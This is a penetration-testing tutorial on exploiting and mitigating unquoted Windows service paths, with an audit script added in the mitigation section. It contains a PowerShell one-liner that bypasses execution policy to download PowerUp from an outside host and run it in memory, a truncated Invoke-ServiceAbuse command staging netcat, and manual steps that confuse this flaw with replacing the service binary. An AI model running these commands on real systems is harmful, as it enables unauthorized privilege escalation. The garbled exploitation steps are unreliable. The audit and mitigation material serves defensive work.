EoP - Unquoted Service Paths

Unquoted Service Path Vulnerabilities: Identification and Exploitation

Key Concepts

  • Service Path: The location of the executable file that a service runs.

  • Unquoted Path: A service path containing spaces but lacking quotation marks (e.g., C:\Program Files\My Service\service.exe instead of "C:\Program Files\My Service\service.exe").

  • Privilege Escalation: Gaining elevated access to protected resources.


Identifying Unquoted Service Paths

1. Using WMIC

The Windows Management Instrumentation Command-line (WMIC) can enumerate services with unquoted paths:

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

The first findstr keeps auto-start services, the second drops anything under C:\Windows, and the last one (pattern """ is a single double-quote character) drops paths that are already quoted.

2. Using PowerShell

A PowerShell script provides a more automated method to identify unquoted paths:

# Services running as LocalSystem whose image path contains a space and is not already quoted
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.StartName -eq "LocalSystem" } |
    Select-Object Name, DisplayName, PathName, StartMode |
    Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match " " }

3. Using PowerUp

PowerUp, a PowerShell script, identifies privilege escalation vectors, including unquoted paths:

powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://xyz/PowerUp.ps1'); Invoke-AllChecks"

Example Output:

[*] Checking for unquoted service paths...
ServiceName   : BBSvc
Path          : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>

Exploiting Unquoted Service Paths

Manual Exploitation Steps

  1. Identify the Vulnerable Service: Use the methods above to detect vulnerable services.

  2. Create a Malicious Executable: Generate a payload (e.g., a reverse shell) and place it in the same directory as the legitimate executable.

  3. Stop the Service:

    sc stop [SERVICE_NAME]

  4. Replace the Executable: Replace the legitimate executable with the malicious payload.

  5. Restart the Service:

    sc start [SERVICE_NAME]

  6. Gain Access: When the service restarts, it will execute the malicious payload with elevated privileges.


Example of Automatic Exploitation with PowerUp

Use PowerUp’s Invoke-ServiceAbuse to automate exploitation:

Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 1"

Replace [SERVICE_NAME] with the vulnerable service name and specify the payload command.


Example of Exploitation Behavior

For a service with the path:

C:\Program Files\Something\legit.exe

Windows will attempt to execute:

  1. C:\Program.exe

  2. C:\Program Files.exe

  3. C:\Program Files\Something\legit.exe

If a malicious Program.exe or Program Files.exe is placed in these locations, it will execute with elevated privileges.


Exploiting with Metasploit

Metasploit provides an exploit module for unquoted service paths:

use exploit/windows/local/trusted_service_path

This automates the process of finding and exploiting unquoted paths.


Mitigation Strategies

1. Quote Service Paths

Always enclose service paths in quotes, particularly if they contain spaces:

"C:\Program Files\My Service\service.exe"
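The audit helper below is an added example, not code from the original page or from PowerUp; the function name Get-UnquotedServicePath and its output fields are my own choices. It ties together the identification section, the lookup order described under "Example of Exploitation Behavior" and this mitigation: for each unquoted image path it lists the candidate executables Windows would try before the real one and prints the sc.exe command that quotes the path.

```powershell
# Added audit helper (not from the original page or PowerUp). Run in an elevated
# PowerShell session on the host being audited; it only reads service configuration.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            $svc = $_
            # Separate the executable from its arguments: the image ends at the first ".exe".
            $m = [regex]::Match($svc.PathName, '^(.*?\.exe)\b', 'IgnoreCase')
            $image = if ($m.Success) { $m.Groups[1].Value } else { $svc.PathName }
            $trailing = $svc.PathName.Substring($image.Length)
            if ($image -notmatch ' ') { return }         # no space: path parses unambiguously
            if ($image -like 'C:\Windows\*') { return }  # system directories are not user-writable

            # Candidates in the order Windows tries them: the path cut at each space,
            # with ".exe" appended, and finally the intended image itself.
            $tokens = $image -split ' '
            $candidates = @(for ($i = 1; $i -lt $tokens.Count; $i++) {
                ($tokens[0..($i - 1)] -join ' ') + '.exe'
            })
            $candidates += $image

            [pscustomobject]@{
                Name       = $svc.Name
                StartMode  = $svc.StartMode
                RunAs      = $svc.StartName
                ImagePath  = $image
                Candidates = $candidates
                # Remediation: quote the image path; sc.exe requires the space after "binPath=".
                FixCommand = "sc.exe config `"$($svc.Name)`" binPath= `"\`"$image\`"$trailing`""
            }
        }
}

Get-UnquotedServicePath | Format-List
```

For the BBSvc entry shown in the PowerUp output above, Candidates would be C:\Program.exe, C:\Program Files\Microsoft\Bing.exe and the real BBSvc.exe path, and FixCommand is the sc.exe config line that wraps the path in escaped quotes.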

2. Regular Audits

Periodically audit service configurations to detect and remediate unquoted paths.

3. Use Least Privilege

Run services with the least privilege required, avoiding LocalSystem unless absolutely necessary.

4. Implement Security Policies

Adopt strict policies to manage service configurations.

5. Monitoring and Alerts

Set up monitoring to detect unauthorized changes to service paths or configurations.

